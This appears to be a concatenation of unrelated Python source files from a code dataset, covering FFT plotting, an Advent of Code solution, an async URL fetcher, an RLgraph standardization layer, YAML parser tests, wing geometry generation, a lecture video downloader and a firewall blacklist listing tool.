'diff': d4['PmW']-d6['PmW']
})
diff5 = pd.DataFrame({
'X': d2['X'],
'diff': d2['PmW']-d1['PmW']
})
diff6 = pd.DataFrame({
'X': d2['X'],
'diff': d4['PmW']-d3['PmW']
})
totalp1 = sum(diff1['diff'][0:301])
totalp2 = sum(diff2['diff'][0:301])
totalp3 = sum(diff3['diff'][0:301])
totalp4 = sum(diff4['diff'][0:301])
totalp5 = sum(diff5['diff'][0:301])
totalp6 = sum(diff6['diff'][0:301])
print('Total Power (x-axis)=%.5f' % totalp1)
print('Total Power (y-axis)=%.5f' % totalp2)
'''
plt.style.use('ggplot')
gs = gridspec.GridSpec(2, 2)
fig = plt.figure(figsize=(16, 9))
ax1 = fig.add_subplot(gs[:,:])
ax1.set_title('Cavity Lock FFT')
ax1.set_ylabel(r'Amplitude (dBm)')
ax1.set_xlabel('Frequency (kHz)')
ax1.plot(d1['X'], d1['CH1'], label='Locked')
ax1.set_xlim(0, 10)
'''ax1.plot(d3['X'], d2['CH1'], label='Chamber')'''
#ax1.plot(d2['X'], d2['CH1'], label='Unlocked')
ax1.legend()
'''ax3 = fig.add_subplot(gs[0, 1])
ax3.set_title('Difference')
ax3.set_ylabel(r'Power ($\mu$W)')
ax3.set_xlabel('Frequency (kHz)')
ax3.plot(diff1['X'], diff1['diff'])
ax3.plot(diff3['X'], diff3['diff'])
ax3.plot(diff5['X'], diff5['diff'], color='green')
ax3.fill_between(diff1['X'], diff1['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Ref - NL, [0, 3 kHz])' % totalp1)
ax3.fill_between(diff3['X'], diff3['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm - NL, [0, 3 kHz])' % totalp3)
ax3.fill_between(diff5['X'], diff5['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm - Ref, [0, 3 kHz])' % totalp5, color='green')
ax3.set_xlim(0, 3)
ax3.legend()
ax2 = fig.add_subplot(gs[1, 0])
ax2.set_title('y-axis FFT')
ax2.set_ylabel(r'Amplitude (dBm)')
ax2.set_xlabel('Frequency (kHz)')
ax2.plot(d2['X'], d3['CH1'], label='Reflection')
ax2.plot(d4['X'], d4['CH1'], label='Chamber')
ax2.plot(d6['X'], d6['CH1'], label='No Light', color='green')
ax2.legend()
ax4 = fig.add_subplot(gs[1, 1])
ax4.set_title('Difference')
ax4.set_ylabel(r'Power ($\mu$W)')
ax4.set_xlabel('Frequency (kHz)')
ax4.plot(diff2['X'], diff2['diff'])
ax4.plot(diff4['X'], diff4['diff'])
ax4.plot(diff6['X'], diff6['diff'], color='green')
ax4.fill_between(diff2['X'], diff2['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Ref-NL, [0, 3 kHz])' % totalp2)
ax4.fill_between(diff4['X'], diff4['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm-NL, [0, 3 kHz])' % totalp4)
ax4.fill_between(diff6['X'], diff6['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm-Ref, [0, 3 kHz])' % totalp6, color='green')
ax4.set_xlim(0, 3)
ax4.legend()
fig.subplots_adjust(left=0.06, bottom=0.08, right=0.95, top=0.95, wspace=0.12, hspace=0.25)'''
plt.show()
|
StarcoderdataPython
|
11236751
|
<filename>day1/aoc-day1.py
import itertools
def get_frequency(fn: str, start: int = 0) -> int:
"""Takes frequency modulation file and returns final frequency"""
with open(fn) as f:
return start + sum(int(item) for item in f)
def first_repeat(fn: str, start: int = 0) -> int:
"""Finds the first repeating frequency when cycling the modulation file
Note: Updating a dict item-by-item seems faster than set; using dummy dict
"""
seen = {start: 0}
frequency = start
with open(fn) as f:
for modulation in itertools.cycle(f):
frequency += int(modulation)
if frequency in seen:
return frequency
seen[frequency] = 0
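# For comparison, the set-based variant mentioned in the docstring would look
# like this (a sketch, not benchmarked here):
#   seen = {start}
#   for modulation in itertools.cycle(f):
#       frequency += int(modulation)
#       if frequency in seen:
#           return frequency
#       seen.add(frequency)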
if __name__ == "__main__":
frequency = get_frequency("day1-input.txt")
print(f"After one modulation cycle, the frequency is: {frequency}")
repeating_frequency = first_repeat("day1-input.txt")
print(f"The first repeating frequency is: {repeating_frequency}")
|
StarcoderdataPython
|
3309800
|
from typing import Dict, List
import aiohttp
from aiohttp import client_exceptions
import asyncio
import time
import datetime
"""
Usage:
Use this program from another file using the following:
- import async_web_requests
- results = async_web_requests.main_loop(urls_list, output=bool)
"""
# Credits given when credits are due...
# The code here is a bit modified version from a StackOverFlow post's answer:
# https://stackoverflow.com/questions/64335959/how-to-avoid-error-429-too-many-requests-python-with-asyncio
# TODO: I think I could simplify this a bit...
# TODO: I think this could benefit from being an object, didn't think about it when I started...
# TODO: Make a logger.
async def fetch(session: aiohttp.ClientSession, task: dict, output=False):
"""
Fetches one item from the given URL.
This function should be used from an asynchronous function loop...
Parameters
----------
task:
in a format
{
"url": Str to a site
"result": None
"status": int
}
output:
True if any printable output is needed.
"""
try:
async with session.get(task["url"]) as response:
# Correct status.
if response.status == 200:
text = await response.text()
# Gone status. Still taking the text...
elif response.status == 410:
text = await response.text()
# Not found.
elif response.status == 404:
text = "not found"
# Forbidden status.
elif response.status == 403:
text = "forbidden"
# Small await, for some reason :D?
await asyncio.sleep(0.01)
# Sometimes status not in any of the above. Hence this.
else:
text = "unknown"
task["result"] = text
task["status"] = response.status
task["datetime"] = datetime.datetime.now()
except asyncio.CancelledError:
# Just marking the task as new so it will be fetched again, as this error means that
# the fetch_all(...) has been stopped due to too many Forbidden codes in a row.
# The stop helps to get rid of the code faster.
task["result"] = None
task["status"] = "new"
# Is this a real concern?
except client_exceptions.ClientOSError:
task["result"] = None
task["status"] = "forbidden"
except asyncio.TimeoutError:
task["result"] = None
task["status"] = "forbidden"
async def fetch_all(
session: aiohttp.ClientSession,
urls: List[str],
output=False,
task_per_second: int = 1000,
forbidden_max: int = 10,
output_number: int = 100,
):
"""
Fetches multiple sites using a list of URLs given as a parameter.
Handles error code 403 (forbidden) in order to fetch sites that do not want to be scraped too quickly.
Handles invalid URLs to some extent, etc.
Parameters
----------
urls:
A list containing URLs to sites from which the data will be collected.
task_per_second:
How many tasks the fetcher should try per second. Some sites are best scraped with a low
task_per_second number, as these sites do not want to be scraped at all, but most sites benefit
from 1000 or more, i.e., low for heterogeneous sites, possibly high for homogeneous sites.
output:
True if any printable output is needed.
forbidden_max:
How many forbidden (403) responses may arrive before the fetcher sleeps.
- This can make some sites slow to scrape: if a site only allows about 2500 requests per minute,
fetching 25k different URLs from it will take a very long time, because the site keeps returning
403 error codes. The 403 handling isn't elegant, but it works: it doesn't break, it keeps trying to
fetch all of the URLs, and it simply waits for an arbitrary time before trying again. Respect the
site owner (use for educational purposes only!).
"""
start = time.perf_counter()
if output is True:
print("Starting to fetch URLs...")
print(f"Total URLs: {len(urls)}")
url_tasks = [
{"url": url, "result": None, "status": "new", "datetime": None} for url in urls
]
tasks_total = len(url_tasks)
pos = 0
while True:
if pos % 100 == 0 or pos == 0:
start2 = time.perf_counter()
tasks_forbidden = len([i for i in url_tasks if i["status"] in [403]])
if tasks_forbidden > forbidden_max:
if output is True:
print(f"{forbidden_max} or more forbidden responses!")
print("Stopping now...")
# Sleep for some reason?
await asyncio.sleep(2)
break
# fetch = currently fetching
tasks_running = len([i for i in url_tasks if i["status"] in ["fetch"]])
# new = not yet fetched successfully
tasks_waiting = len([i for i in url_tasks if i["status"] == "new"])
# New fetch task if condition is met
if pos < tasks_total and tasks_running < task_per_second:
current_task = url_tasks[pos]
current_task["status"] = "fetch"
asyncio.create_task(fetch(session, current_task))
pos += 1
# Output on every Xth URL
if pos % output_number == 0 and output is True:
print("Done tasks: {...}")
print(f"Scheduled tasks: {pos}")
print(f"Running now {tasks_running}")
print(f"Remaining tasks: {tasks_waiting}")
print(f"Time taken for {pos} URLs: {time.perf_counter() - start}")
print()
if tasks_running >= task_per_second:
if output is True:
print("Throttling (2s)...")
await asyncio.sleep(2)
# If still waiting or running tasks, keep loop running.
if tasks_waiting != 0 or tasks_running > 0:
await asyncio.sleep(0.01)
else:
await asyncio.sleep(5)
break
"""
# TODO: Does this have any real effect on the program :D?
# Like why would it really have any effect...?
# Graceful shutdown, needs to run the tasks that are still running
# Does this really do anything :D???
"""
running_now = asyncio.all_tasks()
asyncio.gather(*running_now)
return url_tasks
async def fetcher(
urls: List[str],
output=False,
task_per_second: int = 1000,
forbidden_max: int = 10,
output_number: int = 100,
):
"""
Main function to run the programs here with default parameters, etc...
I don't think that this is even a necessary function?
Parameters
----------
urls: A list containing urls to be fetch.
A list containing URLs to sites from which the data will be collected.
task_per_second:
How many tasks the fetcher should try per second. Some sites are best scraped with a low
task_per_second number, as these sites do not want to be scraped at all, but most sites benefit
from 1000 or more, i.e., low for heterogeneous sites, possibly high for homogeneous sites.
output:
True if any printable output is needed.
forbidden_max:
How many forbidden (403) responses may arrive before the fetcher sleeps.
"""
async with aiohttp.ClientSession() as session:
results = await fetch_all(
session, urls, output, task_per_second, forbidden_max, output_number
)
return results
def main_loop(urls: list, output=False):
"""
Main loop that fetches the data, from a list of URLs.
Tries to handle the 403 errors as well as its possible...
TODO: add params...
"""
start = time.perf_counter()
task_results = []
pos = 0
sleep_min = 5
if output is True:
print("Starting main_loop asynch web requests...")
print("Total tasks:", len(urls))
print()
while True:
start2 = time.perf_counter()
pos += 1
# Run the main fetcher function
results = asyncio.get_event_loop().run_until_complete(
fetcher(urls, output=output)
)
# Append those with any status code other than 403 or 'new'
[
task_results.append(result)
for result in results
if result["status"] != 403 and result["status"] != "new"
]
if output is True:
__print_fetched(results, task_results, start, start2)
# forbidden_list = get_forbidden_results(results)
urls = __get_forbidden_and_new_urls(results)
if len(urls) == 0:
break
if output is True:
print(f"Forbidden on {len(urls)}, trying again...")
print(f"Time passed: {time.perf_counter() - start}")
print(f"Time passed this lap: {time.perf_counter() - start2}")
sleeper(sleep_min, True)
print()
else:
sleeper(sleep_min, False)
return task_results
def __get_results_by_code(code, results) -> list:
"""
Get a list of results filtered from results dict, using code.
"""
return [i for i in results if i["status"] == code]
def __get_forbidden_and_new_urls(results):
urls = [i["url"] for i in results if i["status"] == 403 or i["status"] == "new"]
return urls
def __print_fetched(results, task_results, start, start2):
codes = [200, 403, 410, 404]
print(f"This lap time: {time.perf_counter() - start2}")
for code in codes:
code_results = __get_results_by_code(code, results)
print(f"Code: {code}...")
print(" ", len(code_results))
print(f"Done now in total: {len(task_results)}")
print(f"Time {time.perf_counter() - start}")
def sleeper(minutes: int = 5, output=True):
for i in range(minutes):
if output is True:
print(f"Sleeping for {minutes - i} minutes...")
time.sleep(60)
if output is True:
print("Sleeping done...")
if __name__ == "__main__":
exit(
f"This program ({__file__}) should be used via the main_loop function it contains, thus, don't directly run the file!"
f"\nSee the file for more details..."
)
|
StarcoderdataPython
|
4911681
|
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.components.layers.preprocessing import PreprocessLayer
from rlgraph.utils.decorators import rlgraph_api
from rlgraph.utils.util import SMALL_NUMBER
if get_backend() == "tf":
import tensorflow as tf
elif get_backend() == "pytorch":
import torch
class MovingStandardize(PreprocessLayer):
"""
Standardizes inputs using a moving estimate of mean and std.
"""
def __init__(self, batch_size=1, scope="moving-standardize", **kwargs):
"""
Args:
batch_size (int): Number of samples processed per step.
"""
super(MovingStandardize, self).__init__(scope=scope, **kwargs)
self.batch_size = batch_size
self.sample_count = None
# Current estimate of state mean.
self.mean_est = None
# Current estimate of the sum of squared deviations (used to derive the std).
self.std_sum_est = None
self.output_spaces = None
self.in_shape = None
def create_variables(self, input_spaces, action_space=None):
in_space = input_spaces["preprocessing_inputs"]
self.output_spaces = in_space
self.in_shape = (self.batch_size, ) + in_space.shape
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
self.sample_count = 0.0
self.mean_est = np.zeros(self.in_shape, dtype=np.float32)
self.std_sum_est = np.zeros(self.in_shape, dtype=np.float32)
elif get_backend() == "tf":
self.sample_count = self.get_variable(name="sample-count", dtype="float", initializer=0.0, trainable=False)
self.mean_est = self.get_variable(
name="mean-est",
shape=self.in_shape,
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()
)
self.std_sum_est = self.get_variable(
name="std-sum-est",
shape= self.in_shape,
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()
)
@rlgraph_api
def _graph_fn_reset(self):
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
self.sample_count = 0.0
self.mean_est = np.zeros(self.in_shape)
self.std_sum_est = np.zeros(self.in_shape)
elif get_backend() == "tf":
return tf.variables_initializer([self.sample_count, self.mean_est, self.std_sum_est])
@rlgraph_api
def _graph_fn_apply(self, preprocessing_inputs):
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
# https://www.johndcook.com/blog/standard_deviation/
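# Running update in the style of the link above (descriptive comment): with
# n = sample_count and x = preprocessing_inputs,
#   mean_n = mean_{n-1} + (x - mean_{n-1}) / n
#   M2_n   = M2_{n-1} + (x - mean_{n-1})**2 * (n - 1) / n
# where M2 is stored in self.std_sum_est and the variance estimate used below
# is M2 / (n - 1).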
preprocessing_inputs = np.asarray(preprocessing_inputs, dtype=np.float32)
self.sample_count += 1.0
if self.sample_count == 1.0:
self.mean_est[...] = preprocessing_inputs
else:
update = preprocessing_inputs - self.mean_est
self.mean_est[...] += update / self.sample_count
self.std_sum_est[...] += update * update * (self.sample_count - 1.0) / self.sample_count
# Subtract mean.
result = preprocessing_inputs - self.mean_est
# Estimate variance via sum of variance.
if self.sample_count > 1.0:
var_estimate = self.std_sum_est / (self.sample_count - 1.0)
else:
var_estimate = np.square(self.mean_est)
std = np.sqrt(var_estimate) + SMALL_NUMBER
standardized = result / std
if get_backend() == "pytorch":
standardized = torch.Tensor(standardized)
return standardized
elif get_backend() == "tf":
assignments = [tf.assign_add(ref=self.sample_count, value=1.0)]
with tf.control_dependencies(assignments):
# 1. Update vars
assignments = []
update = preprocessing_inputs - self.mean_est
mean_update = tf.cond(
pred=self.sample_count > 1.0,
false_fn=lambda: self.mean_est,
true_fn=lambda: update
)
var_update = update * update * (self.sample_count - 1) / self.sample_count
assignments.append(tf.assign_add(ref=self.mean_est, value=mean_update))
assignments.append(tf.assign_add(ref=self.std_sum_est, value=var_update))
with tf.control_dependencies(assignments):
# 2. Compute var estimate after update.
var_estimate = tf.cond(
pred=self.sample_count > 1,
false_fn=lambda: tf.square(x=self.mean_est),
true_fn=lambda: self.std_sum_est / (self.sample_count - 1)
)
result = preprocessing_inputs - self.mean_est
std = tf.sqrt(x=var_estimate) + SMALL_NUMBER
return result / std
|
StarcoderdataPython
|
1804623
|
<filename>bboard_downloader/scraper.py
import requests
from datetime import datetime
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from tqdm import tqdm
HEADERS = {'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'} # http://www.useragentstring.com/index.php?id=19858
def get_driver(browser, executable_path, headless):
if browser == 'chrome':
opts = webdriver.ChromeOptions()
opts.headless = headless
driver = webdriver.Chrome(executable_path=executable_path, options=opts)
elif browser == 'firefox':
opts = webdriver.FirefoxOptions()
opts.headless = headless
driver = webdriver.Firefox(executable_path=executable_path, options=opts)
else:
raise ValueError("The only currently supported browsers are Google Chrome and Mozilla Firefox")
return driver
def is_unauthorized(driver):
unauthorized = False
try:
element = driver.find_element_by_xpath("//h1[@class='recording-failure-title full-page-title ng-scope ng-binding']")
if element.get_attribute("analytics-id") == "recording.failure.unauthorized.title":
unauthorized = True
finally:
return unauthorized
def get_video_src(driver, url, T):
driver.get(url)
try:
recording_title = WebDriverWait(driver, T).until(
EC.presence_of_element_located((By.ID, "recording-name"))
).get_attribute("innerText").replace("/", "-")
recording_date = datetime.strptime(
WebDriverWait(driver, T).until(
EC.presence_of_element_located((By.XPATH, '//span[@ng-if="recordingMenu.model.recordingDate"]'))
).get_attribute("innerText"),
'%b %d, %Y'
).strftime('%Y%m%d')
video_src = driver.find_element_by_id("playback-video-playback-video_html5_api").get_attribute("src")
except TimeoutException:
if is_unauthorized(driver):
raise WebDriverException("Unauthorized request: the recording URL is likely to have expired")
else:
raise TimeoutException("Can't seem to find the video at the specified URL; try to manually increase the maximum waiting time or run the command with --gui for graphical debugging")
finally:
driver.quit()
return recording_title, recording_date, video_src
def download_video(video_src, outdir, recording_date, recording_title='', course_code=None):
outpath = outdir/f"{recording_date}_{recording_title}.mp4" if course_code is None else outdir/f"{course_code}_{recording_date}.mp4"
response = requests.get(video_src, headers=HEADERS, stream=True) # stream allows to iterate over response
total_size_in_bytes= int(response.headers.get('content-length', 0))
block_size = 1024 #1 Kibibyte
progress_bar = tqdm(desc=f"Downloading {recording_title}", total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(outpath, 'wb') as f:
for chunk in response.iter_content(block_size):
progress_bar.update(len(chunk))
f.write(chunk)
progress_bar.close()
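# A minimal usage sketch (the driver path, URL and output directory below are
# placeholders, not values taken from the project):
#   from pathlib import Path
#   driver = get_driver("firefox", "/usr/local/bin/geckodriver", headless=True)
#   title, date, src = get_video_src(driver, "https://example.com/recording", T=30)
#   download_video(src, Path("downloads"), date, title)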
|
StarcoderdataPython
|
3280394
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests tools.validators.instance_validator.instance_parser"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from validate import instance_parser
from absl.testing import absltest
_TESTCASE_PATH = os.path.join('.', 'tests', 'fake_instances')
class ParserTest(absltest.TestCase):
def testInstanceValidatorDetectDuplicateKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_duplicate_keys.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectMissingColon(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_missing_colon.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperSpacing(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_spacing.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperTabbing(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_tabbing.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorParseProperFormat(self):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'GOOD',
'good_building_type.yaml'))
self.assertIsNotNone(parse)
def testInstanceValidatorParseProperConnections(self):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'GOOD',
'good_building_connections.yaml'))
self.assertIsNotNone(parse)
def testInstanceValidatorDetectImproperTranslationCompliance(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_compliant.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperTranslationKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_keys.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperUnitsKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_units_format.yaml'))
self.assertIsNone(parse)
if __name__ == '__main__':
absltest.main()
|
StarcoderdataPython
|
9791195
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 17:28:37 2016
Example script for generating a transonic airliner wing external geometry.
@author: pchambers
"""
import numpy as np
from airconics import primitives
from airconics import liftingsurface
# ==============================================================================
# Transonic passenger airliner wing geometry example
# (planform similar to that of the Boeing 787 family)
# ==============================================================================
def myDihedralFunctionAirliner(Epsilon):
"""User-defined function describing the variation of dihedral as a function
of the leading edge coordinate"""
BaseDihedral = 7
# A simple model of a loaded wing shape:
return BaseDihedral + Epsilon*Epsilon*10
def myTwistFunctionAirliner(Epsilon):
"""User-defined function describing the variation of twist as a function
of the leading edge coordinate. The coefficients of the polynomial below
come from the following twist values taken off the CRM (used for the AIAA
drag prediction workshops):
Epsilon = 0: twist = 4.24
Epsilon =0.3: twist = 0.593
Epsilon = 1: twist = -3.343"""
return -(6.53*Epsilon*Epsilon - 14.1*Epsilon + 4.24)
def myChordFunctionAirliner(Epsilon):
"""User-defined function describing the variation of chord as a function of
the leading edge coordinate"""
ChordLengths = np.array([0.5, 0.3792, 0.2867, 0.232, 0.1763, 0.1393, 0.1155,
0.093, 0.0713, 0.055, 0.007])
EpsArray = np.linspace(0, 1, 11)
return np.interp(Epsilon, EpsArray, ChordLengths)
def myAirfoilFunctionAirliner(Epsilon, LEPoint, ChordFunct, ChordFactor,
DihedralFunct, TwistFunct):
"""Defines the variation of cross section as a function of Epsilon"""
AfChord = ((ChordFactor*ChordFunct(Epsilon)) /
np.cos(np.radians(TwistFunct(Epsilon))))
Af = primitives.Airfoil(LEPoint, ChordLength=AfChord,
Rotation=DihedralFunct(Epsilon),
Twist=TwistFunct(Epsilon),
CRMProfile=True, CRM_Epsilon=Epsilon)
return Af
def mySweepAngleFunctionAirliner(Epsilon):
"""User-defined function describing the variation of sweep angle as a function
of the leading edge coordinate"""
SweepAngles = np.array([90, 87, 35, 35, 35, 35, 35, 35, 35, 35, 80])
EpsArray = np.linspace(0, 1, 11)
return np.interp(Epsilon, EpsArray, SweepAngles)
if __name__ == "__main__":
import airconics
# Initialise the display
from OCC.Display.SimpleGui import init_display
display, start_display, add_menu, add_function_to_menu = init_display()
# Position of the apex of the wing
P = (0,0,0)
# Class definition
NSeg = 10
# Instantiate the class
ChordFactor = 1
ScaleFactor = 50
# First try a standard CRM airfoil:
# Af_crm = airconics.primitives.Airfoil([0., 6., 1.], CRMProfile=True, CRM_Epsilon=0.8)
# display.DisplayShape(Af_crm.Curve, update=True, color='GREEN');
Wing = liftingsurface.LiftingSurface(P, mySweepAngleFunctionAirliner,
myDihedralFunctionAirliner,
myTwistFunctionAirliner,
myChordFunctionAirliner,
myAirfoilFunctionAirliner, SegmentNo=NSeg, ScaleFactor=ScaleFactor)
#Wing.Display(display)
start_display()
|
StarcoderdataPython
|
9759008
|
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from rasacore.training import Train
class Command(BaseCommand):
help = 'Training base on core.rasa.ai'
def handle(self, *args, **options):
try:
train_cls = Train()
train_cls.run()
except Exception as ex:
raise CommandError('Error %s ' % str(ex))
self.stdout.write(self.style.SUCCESS('Done training models'))
|
StarcoderdataPython
|
1838348
|
def mul(x, y):
product = 0
while y > 0:
product += x
y -= 1
return product
print(mul(5, 3))
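# Illustrative extension (an assumption, not part of the original snippet): the loop
# in mul() only terminates for a non-negative integer y, so a sign-aware wrapper is
# one simple way to cover negative multipliers as well.
def mul_signed(x, y):
    if y < 0:
        return -mul(x, -y)
    return mul(x, y)
print(mul_signed(5, -3))  # expected output: -15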
|
StarcoderdataPython
|
1626415
|
""" nftfwls - List data from nftfw blacklist database
"""
import sys
import datetime
from signal import signal, SIGPIPE, SIG_DFL
from pathlib import Path
import argparse
import logging
from prettytable import PrettyTable
from .fwdb import FwDb
from .config import Config
from .geoipcountry import GeoIPCountry
from .stats import duration
log = logging.getLogger('nftfw')
def loaddb(cf, orderby='last DESC'):
"""Load all data in firewall database
Parameters
----------
cf : Config
orderby : str
Sorting order for data
Returns
-------
List[Dict[blacklist database schema]]
"""
db = FwDb(cf)
result = db.lookup('blacklist', orderby=orderby)
return result
def loadactive(cf):
"""Load active ips from firewall directory
Parameters
----------
cf : Config
Returns
-------
List[str]
List of filename stems ending in .auto
in blacklist directory
"""
path = cf.etcpath('blacklist')
out = []
for p in path.glob('*.auto'):
ip = p.stem
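# The blacklist file names appear to encode the '/' of CIDR ranges as '|'
# (a '/' cannot appear in a file name); map it back so the entries match
# the 'ip' values stored in the database.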
ip = ip.replace('|', '/')
out.append(ip)
return out
def activedb(dbdata, active):
"""Reduce database to active entries
Parameters
----------
dbdata : List[Dict[]]
List of database entries
active : List
List of stems in blacklist directory
Returns
-------
List[Dict[active entries database schema]]
"""
out = [e for e in dbdata if e['ip'] in active]
return out
def datefmt(fmt, timeint):
"""Return formatted date - here so it can be changed
in one place
Parameters
----------
fmt : str
Time format from the ini file
timeint : int
Unix timestamp
Returns
-------
str
Formatted string
"""
value = datetime.datetime.fromtimestamp(timeint)
return value.strftime(fmt)
def formatline(date_fmt, pattern_split, line, geoip, is_html=False):
"""Format a single line of data
Parameters
----------
date_fmt : str
Format string from ini file
pattern_split : bool
If true split patterns at comma into
newline and a space
line : Dict(database)
geoip : Instance of the geoip class
is_html : bool
True if HTML output wanted
Returns
-------
List
List of display columns
"""
# Add countrycode to IP if exists
ip = line['ip']
if geoip.isinstalled():
country, iso = geoip.lookup(ip)
if iso is None:
iso = " "
elif is_html:
# if html add abbr so mouseover shows country name
if country is not None:
iso = f'<abbr title="{country}">{iso}</abbr>'
ip = iso + " " + ip
# special handling for last, and duration
if line['first'] == line['last']:
estring = '-'
dstring = '-'
else:
estring = datefmt(date_fmt, line['first'])
dstring = "%8s" % (duration(line['first'], line['last']),)
# deal with the useall flag
pstring = line['ports']
if line['useall']:
pstring = 'all'
# make patterns into two lines
if pattern_split:
pats = "\n ".join(line['pattern'].split(","))
else:
pats = line['pattern']
return ([ip, \
pstring, \
str(line['matchcount']) + '/' + str(line['incidents']), \
datefmt(date_fmt, line['last']), \
estring, \
dstring, \
pats])
def displaytable(cf, dt, noborder=False):
"""Display the data to terminal
Parameters
----------
cf : Config
dt : List[Dict[database]]
Database entries to show
noborder : bool
If true displays no border
"""
# pylint: disable=unsupported-assignment-operation
# doesn't like the assignment to pt.align
# cf values loaded in __main__
fmt = cf.date_fmt
pattern_split = cf.pattern_split
geoip = GeoIPCountry()
pt = PrettyTable()
if noborder:
pt.border = False
pt.header = False
pt.field_names = ['IP'+'('+str(len(dt))+')',
'Port', 'Ct/Incd', 'Latest',
'First', 'Duration', 'Pattern']
for line in dt:
pt.add_row(formatline(fmt, pattern_split, line, geoip))
# set up format
pt.align = 'l'
pt.align['Ct/Incd'] = 'c'
print(pt)
def displayhtml(cf, dt):
"""Display the data as HTML table
Parameters
----------
cf : Config
dt : List[Dict[database]]
Database entries to show
"""
fmt = cf.date_fmt
pattern_split = cf.pattern_split
geoip = GeoIPCountry()
tdata = []
for line in dt:
tdata.append(formatline(fmt, pattern_split, line, geoip, is_html=True))
print('<table class="nftfwls">')
field_names = ['IP'+'('+str(len(dt))+')',
'Port', 'Ct/Incd', 'Latest',
'First', 'Duration', 'Pattern']
htmlrow('heading', field_names)
for line in tdata:
htmlrow('content', line)
print('</table>')
def htmlrow(htmlclass, line):
"""Print an htmlrow
Parameters
----------
htmlclass : str
Class to be added to row
line : List(data)
"""
print(f' <tr class="{htmlclass}">')
ix = 0
for edited in line:
ix = ix + 1
colclass = 'col' + str(ix)
print(f' <td class="{colclass}">', end='')
if ix > 1:
# ip may have html in it
edited = edited.replace(' ', '&nbsp;')
edited = edited.replace('\n', '<br>')
print(edited, end='')
print('</td>')
print(' </tr>')
def main():
""" Main action """
#pylint: disable=too-many-branches, too-many-statements
# ignore broken pipe error - thrown when using
# nftfwls into the head command
signal(SIGPIPE, SIG_DFL)
cf = Config()
desc = """nftfwls - list firewall information
Default output is to show active entries sorted by
time of last incident (in descending order)
"""
ap = argparse.ArgumentParser(prog='nftfwls',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=desc)
ap.add_argument('-c', '--config',
help='Supply a configuration file overriding the built-in file')
ap.add_argument('-w', '--web',
help='Print output as an HTML table',
action='store_true')
ap.add_argument('-p', '--pattern-split',
help='Set the pattern-split value to yes or no, overrides value in config.ini',
action='append')
ap.add_argument('-a', '--all',
help='Print database information, don\'t look at firewall directory',
action='store_true')
ap.add_argument('-r', '--reverse',
help='Reverse sense of sorting',
action='store_true')
ap.add_argument('-m', '--matchcount',
help='Sort by counts - largest first',
action='store_true')
ap.add_argument('-i', '--incidents',
help='Sort by incidents - largest first',
action='store_true')
ap.add_argument('-n', '--noborder',
help='Don\'t add borders and title to the table',
action='store_true')
ap.add_argument('-q', '--quiet',
help='Suppress printing of errors on the console, syslog output remains active',
action='store_true')
ap.add_argument('-v', '--verbose',
help='Show information messages',
action='store_true')
args = ap.parse_args()
#
# Sort out config
# but don't init anything as yet
#
try:
cf = Config(dosetup=False)
except AssertionError as e:
cf.set_logger(logprint=False)
